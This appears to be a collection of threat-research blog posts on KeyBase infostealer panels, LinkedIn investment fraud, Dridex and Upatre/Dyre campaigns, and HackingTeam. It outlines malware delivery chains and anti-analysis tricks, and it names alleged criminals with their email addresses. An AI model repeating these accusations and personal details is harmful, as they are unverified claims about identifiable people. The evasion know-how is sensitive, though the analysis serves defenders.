Linkedin has approximately 414m active users of which, a part are completely fake. This practise has been observed in the past with fake recruiters targeting researchers.

This content is the result of the same 'gang' of Nigerian criminals who favour KeyBase to steal sensitive credentials. I've observed these gangs (along with @techhelplist who finds a lot of the details included here) using Linkedin as a new platform to perform attempted financial fraud.

A large number of screenshots shared with me are as a the result of a misconfigured Keybase panel, there is a well known bug in Keybase which allows unauthenticated access to the /images/ directory to anyone who knows how to locate them. Palo Alto have listed a large number here

A percentage of determined sock puppets are using LinkedIn as a means at defrauding a significant number of business in following countries:

UAE

US

UK

Figures are created as a result of the companies targeted in the panel images

The sectors that are targeted include Real Estate, Investment & Law. This kind of fraud is complex in the sense it involves geographically displaced criminals to 'link up' to to be successful. The fraud is highly likely comitted from Nigeria (Thanks to @techhelplist again who helped ID the content and fraud gang) the concept is simple - Offering investment or seeking investment depending on the potential victim.

The belief that this fraudulent operation is from Nigeria is because of the evidence provided, this included active Facebook content and helpful photographs of places of work, and friends associated with the gang.

This below image is taken from a panel which shows our 'guy' logged into a Linkedin profile, and a large number of messages all with the same content.

Seeking investment or offering investment.

@malwarehunterteam do a great job on supplying a large number of samples to various malware, iSpy came to my attention recently and the codebase is almost identical to KeyBase with both employing the same stealing functions. I will post a more detailed article on iSpy when i get time.

Reconnaissance message

We offer secured loand or funds to individuals and companies at low interest rates. we offer long and short terms loans or funding of any projects. Our firm has a recored a lot of breakthroughs in the provision of first-class financial services to our clients.

— Akeem

The message above is pretty static and appears to be sent to a large number of potential victims. The method of communication varies across email providers, if you believe you've been approached by this gang, or have been part of the attempted fraud process please contact me, i can share a number of verified IOC's.

The below image is a cap from the /images/ directory which includes a conversation with the 'master' who shares the devices used to perform the initial reconnaissance. Pg.5 on this alludes to the hierarchy involved

In summary, this concept of attempted fraud by social networks should sufficiently deliver a message that nobody is who you believe they are, particularly when dealing with financial transactions.

FireEye produced a research article on the thriving economy on 'scammers' operating out of Nigeria. Pg.11 is of interest in the context of the content here.

The scammers use a variety of tools for distributing these exploitsand keyloggers, such as email extractors, email notifiers, bulkmailing providers, and VPN/proxy providers. The email extractorshelp scammers scrape email addresses of potential targets fromvarious sites which are fed to bulk mailing applications. They useproxy providers as a precaution when logging into their victims’accounts to hide their IP addresses. They also use email notifiersto monitor incoming emails.

Trust, but verify is a mantra that i preach. It's dissapointing that Linkedin does not have any method of formal verification for its users. There is no PGP or Keybase.io input required, even most DNM require some form of ID verification!

@thegrugq makes the point far more eloquently that i ever could. In short, the game of cyber security has changed, and the content in which you operate or call your working environment, is someone else's lunch.

There is some interesting aspects to research, one is being able to understand and analyse how criminals operate. Another is seeing how other researchers operate.

Recently there has been a number of incidents that have involved what has been described as 'white hackers', i don't have a term which sufficiently describes the work other than, 'interesting'.

Who IS the Batman?

Last month, i noted that someone had replaced the malicious content usually delivered by Dridex with Avira and a ' calling card'. The calling card gave information as the content on the compromised server, and the intelligence which i believe was to identify the original owner or the original compromiser of the site

I've again been collating the intel behind this person, or team who are quickly compromising the hosts after its been compromised and listing the details relating to the original compromise.

Following up to now? Good!

Legit site --> compromised ---> compromised again and details posted to identify the original actor.

Recently, a recently compromised site on hxxp://www.wakeupforpeace.org.au/crimeware-server-readme.txt-> Freezepage link http://www.freezepage.com/1456771380KTQSEGLOJB

Has been 'done' by what could be same actors/team previously observed in the Dridex 'incident', i may well be wrong but the details are strikingly similar.

The site itself is a simple phisher, looking for PayPay/banking credentials and some really bad .php handles the theft.

hadhemiaouini92@gmail.com

If anything this should teach you

Do not use your own name for email address if you're going to use to receive the proceeds of crime.

In essence it steals sensitive credentials, here is some of the PHP used to steal the data:

A lot of thanks should go to the great work that @malwarehunterteam, @James_MHT and @Techhelplist are doing to promote the discovery and takedowns of these panels. I have privately and legally, observed some of the content that is being stolen by the criminals and it's extremely sensitive material.

Welcome to KeyBase

KeyBase, as mentioned is a infostealer, and the Palo Alto write up discusses its capabilities in much greater detail than i will.

KeyBase arrives by spoofed mails, often as disguised as office documents, or with double extensions, here is an example.

So, the research and analysis went on, the content became richer.Researchers in certain circles are critically aware of a known bug in KeyBase and further bugs add to the information being less than secure, this is highlighted in the Palo Alto article, and all information is secured was done so legally.

The comical aspect which prompted this post was the fact that KeyBase itself is not advanced, it is very noisy, it does not encrypt data in network communications, perimeter security will detect its patterns as it attempts to exfiltrate any sensitive information demonstrated by the image above with 'Window title' in the packet.

The panels themselves are usually not configured correctly, they are almost 'plug and play', and this is confirmed by the research done by Palo Alto, the screenshots below are all taken from a panel which was completely unsecured and available to view on the open web.

We quickly discovered that the 'miscreants' behind these panels had infected themselves, the reason for this is clear. The interesting screenshots including Facebook profiles, and messages between the gangs.

So, critically. You'll note i have not obscured any content. Joseph Ikems - we've extracted content which was captured from his own panel, or the friend he's discussing the 'problems with the panel' with.

However, it's probably more likely it was jeffjeff, as the panel was closely named to this in terms of domain registration. The reasons for this are shown in part by the content below.

We have email. So, we've managed, or should i say he has given us his email. The above screenshot shows the miscreant logged into a yahoo mail account under the name ' dixion.tony', lets assume its dixion.tony@yahoo.com.

The most advanced threat intelligence platform in the world agrees, this is potentially our guy, he has history and people are complaining about being scammed.

This begun to get interesting as the exposed screenshots yielded more information, this time as the criminals begun to actively target industries, setting up fake domains and fake businesses in an attempt to extort legitimate businesses once they had been compromised.

A tab open 'Textile companies turkey'

The targets included in the spam campaigns had been crafted to appear from a fake company as shown below, 'Jinatrading LLC'

Jinatrading LLc

Looks to be having some 'issues'.

Website content

As the content begun to become more peculiar so did the screenshots captured from the panel. At one point Tony decided to log into Facebook.

Ehhh..Tony!

The total number of screenshots from Tony's own machines exceed 90, and the total of screenshots is over 200. Attempting to alert the victims proved fruitless sadly, a lot of them never responded.

The lessons learned, and not published here are that the criminals behind this enterprise persisted to infect themselves with their own stealer, and fail to understand the technology they worked with, the details here are approximately 20% of what was extracted, including fake company registrations to appear legitimate.

An aggressive financial motive was clear, and some element of muling was involved. The screenshots below show searches for how to clear money or 'cash out'.

How do i hide my stolen money breh?

Detailed IOCs are available upon request, some of the artefacts are available to search via Hash and are listed on VT.

Since the beginning of the year Dridex has returned with an number of new features

New botnet ID's targeting Germany

New persistence methods, including writing to start folders at shutdown

Increased CPU usage when executing(!)

AV targeting and debugger checks

A few samples i've analysed over the past few weeks have exhibited new capabilities, at least in terms of the delivery method and 'on disk' activity. 'Macroseses' as they are referred to in the current campaign mechanisms still prompt the user to enable macros, and still use a AutoOpen mechanism to extract and run. The current delivery is as follows.

MWI>Doc>Macro>Javascript>download over HTTP a .jpg > extract binary and finally execute in %appdata%

The developers appear to be experimenting with new capabilities, the malware i've observed recently appears to be using some rudimentary steganography.

Along with payload development the content is undergoing some active anti reversing tricks using debugger checks which will stop execution if a debugger is detected which i have not personally observed being used by Dridex this year.

Dridex is actively looking to avoid detection and will return an exit to the process if it detects a debugger attached to it. Further advances to the payload include Antivirus checks which in this particular payload had checks for Comodo Security suite.

I also observed some odd behavior in relation to what is being described as 'white hat' activity, by mainstream media. One payload was benign and delivered Avira Antivirus in the way i described above.

Some of the compromised sites hosting the Avira payload had what appeared to be a calling card left as a warning with cryptic messages relating to 'owner' or 'pwner?' and the host.

The final observations are the worrying strings associated with the detection of virtualization.

Upatre has an identity crisis, it thinks it's an RSA encrypted document.

RSA?

Arriving in the form of seemingly 'signed' RSA document and branded with the RSA logo, this very clever change of tactic from the team behind the Upatre/Dyre campaigns have attempted to use what would probably fool the most observant of people.

The junk displayed isn't an RSA key, its just part of a macro which is part of the TTP associated with this particular campaign, whilst it's not a new style. It's certainly very clever.

The strings are visible with the fake key being shown here.

The Dyre/Upatre combination is something that has been used & abused by the same threat actors for sometime, this change of tactic by moving on from the regular spam such as invoices and remittance advice, to something which has a genuine attempt at obscuring its payload shows the constant development that Upatre is undergoing.

Here are some of the proxies in use by the botnet

https:

@techhelplist has been doing some work on identifying these routers and has a tracker on his site

In the computer security context, a hacker is someone who seeks and exploits weaknesses in a computer system or computer network. Hackers may be motivated by a multitude of reasons, such as profit, protest, challenge, enjoyment

— https://en.wikipedia.org/wiki/Hacker_(computer_security)

HackingTeam had some questionable ethics in relation to business practises and had been long been pursued by those who sought to confirm this, One such being Christopher Soghoian who has relentlessly used his ability to raise the profile for the benefit of those being exploited by such as Hacking Team, VUPEN & Gamma.

The Gamma breach could be argued to be the start of the identifying characteristics of known 'corporate enemies' particularly those who provide EaaS or Exploitation as a Service.

The interesting aspect of the Gamma breach was the breach was not met with a fanfare of expectation, much like Lizard Squad or Anonymous & LulzSec indirectly looked to gain notoriety with their actions, the only thing that brokered opinions on Gamma was their business dealings.

Soghoian commented in his PHD document on the approach that has become routine practise.

Assisting Big Brother has become a routine part of business, albeit one that some service providers would probably rather do without

Whilst the argument for Government surveillance is a long, and now more popular discussion amongst those who where none the wiser prior to the hacks, the leaks and breaches, it does indicate that its in the public interests to at least have a mandate on these discussions.

HackingTeam had been on the radar of privacy advocates for sometime, and had been highlighted as dealings with oppressive regimes numerous times. The claim was vindicated by news once HT had been breached and the data appeared online with numerous conversations with those regimes had been confirmed.

https://twitter.com/ClausHoumann/status/649487453502488577/photo/1

The connection between breaches and hacks is a distinction that probably needs to be made clearer. If, given the motivation of a hacker can be left to the conclusion of the victim. It's always going to be malicious. If in the case of a company that chooses to sell 0day exploits in order to perform genocide, then its a hack, the opposite can be said if a company chooses to portray a political leader in a comical light, therefore offending a nation. It's a breach.

A business is only as strong as the capabilities that protect it, not only in a strategic or a governance manner but in a theoretical capacity.

Ubiqiti had $46m siphoned out of their accounts by way of a phishing email, this was disclosed on the SEC filings & this demonstrates the levels of losses that face a business as a result of phishing.

I spend a lot of my time tracking phishing campaigns and the associated botnets that make money, realmoney from the fraudulent transactions that occur as a result of phishing campaigns. Often, mail campaigns arrive in the 10's of thousands to unsuspecting recipients & that threat is growing greater.

Do you have the ability to received unsolicited emails from spammers? Does your hardware capacity planning include daily spam campaigns?

Do you as a spoofed sender have the ability to take hundreds of disgrunted phone calls (See below from @Conradlongmore) and unparalleled traffic to your site wondering why 'you' are sending emails asking for payment, or whatever SE technique is being used to deliver the mails.

Are you customers and employees familiar with the disclosure of losses and third party information that may be disclosed as a result of one of your employees opening a phishing email?

Can you cope financially with the fraudulent transactions that may occur as a result of these campaigns?

If you're unable to answer all of these questions with a firm, 'Yes', i would show a great deal of concern in identifying the areas which your business is exposed to. If you have any capabilities for payment processing or receiving payments then the risk of being phished is as great as ever.

$46m, think about that figure and consider if in relative terms you can afford that level of losses.

This time targeting researchers using TOR for anonymous research, i don't think its in the interests of these actors to destroy the victims drives unless they are a target. Its an assumption that only those using TOR for inspection of Dridex campaigns are being targeted.

I noticed when analysing a recent sample, on Window XP that it destroyed the MBR and this seems to tally up with Lexsi research and the comments on Malekai's forum.

With the significant growth into Europe, Spain & France particularly being affected, this menace proves its capabilities with a sting in its tail.

I have recently analysed a sample of what appears to be a newer version of Keybase.

Having been delivered as an executable inside a zip, the malware has the usual key logging capabilities as most trojans, utilising native API calls to hook keyboard processes and using HTTP to upload images of the desktop, the victims in this instance are being uploaded to a server which isn't as tightly managed as usual.

Here is the web panel

Panel

Here are the uploaded screenshots, appended with date and times.

Uploads

Here are some screenshots of applications in use on the victims machines.

Skype

Someone about to do some online banking, which will capture keystrokes as well as the capability to take screenshots.

Banking

Someone placing an order for some materials via Outlook.com

Materials

We can see encoded in the HTTP stream the inclusions of specific keywords including, notepad which i launched and keystrokes included in the request to the C&C uploading the screenshots.

Dyre/Dyreza has gotten some attention this week in relation to targeting banks, after tracking Dridex and other associated banking Trojans I've researched parts of the command and control infrastructure that is abused by Dyre/Dyreza.

I analysed Dyre/Dyreza samples upon infection are seeking to communicate with with a lot of compromised AirOS router's within the botnet.

Dyre

Not only AirOS is affected by Dyre/Dyreza.

RouterOS MicroTiK

Recently, i recall reading on Krebs blog, that Lizard squads DDOS platform ran via using backdoors on compromised routers. If this vector is using brutceforcing of potentially weak usernames and passwords in the same way Lizard squad did, or via a backdoor that ships with the routers for firmware upgrades remains to be seen.

Dridex today reached full SSL capabilities for the communication to the 'Supernodes', a few samples analysed today showed pure SSL traffic connectivity to peer nodes in the botnet, this was something that I feared was evolving considering the active checking of modern sandbox analysis, today this gives Dridex the ability to hide in SSL traffic & the threat posed by this is three fold

SSL traffic is a legal, and political minefield, SSL interception even more.

Companies at risk of spam campaigns are obligated to identify, and mitigate the traffic giving credence to the risk it poses, research can't be done without intercepting SSL traffic.

Smaller companies who do not possess the financial, legal or technical abilities to intercept SSL traffic will not be able to cope with the already advanced threat.

Dridex campaigns are also spreading further into the EU with CERT FR today posting an alert in relation to the campaigns actively targeting France

Dridex Botnet 220, 125 & 120 are now the number one risk posed to businesses that use email as means of communications, the success rates and high turnover in terms of IP infrastructure associated with Dridex make it clear that it's successful tool for criminals.

Whilst everything is being done to monitor backdoors, these threats are coming in through the front door.

Dridex seems to be the most prevalent form of Malware targeting businesses, since the turn of the year i've thrown some numbers around about how Dridex is

Targeting the UK Retail & Finance industry

Evolved using PowerShell (Platform dependant)

Uses rudimentary encryption (ROT13) to attempt to avoid analysis

A newer twist to Dridex is the ability to attempt to circumnavigate some commercial virtualisation. Here is a snippet from one of the samples freely available on Malwr.com or via the excellent hybrid-analysis.com

I could see once the sample was detonated it would drop %temp% files and in the temp files are the configuration details for the sample its currently detonating, it is explicitly attempting to detonate on 'tin', for lack of a better phrase. Didier had encountered this sample, and came to the same conclusion as me.

I prefer to inspect the malicious word document via python scripts than to detonate it in a sandbox.

I again refer to the excellent BotConf i attended in December and talk from Paul Jung discussing sandbox detection

When inspecting the malicious documents i highly recommend http://www.decalage.info/ an the olevba.py scripts which can not only dump the macro and read encoded base64 strings, but will prettify the content into tables for 'reporting'.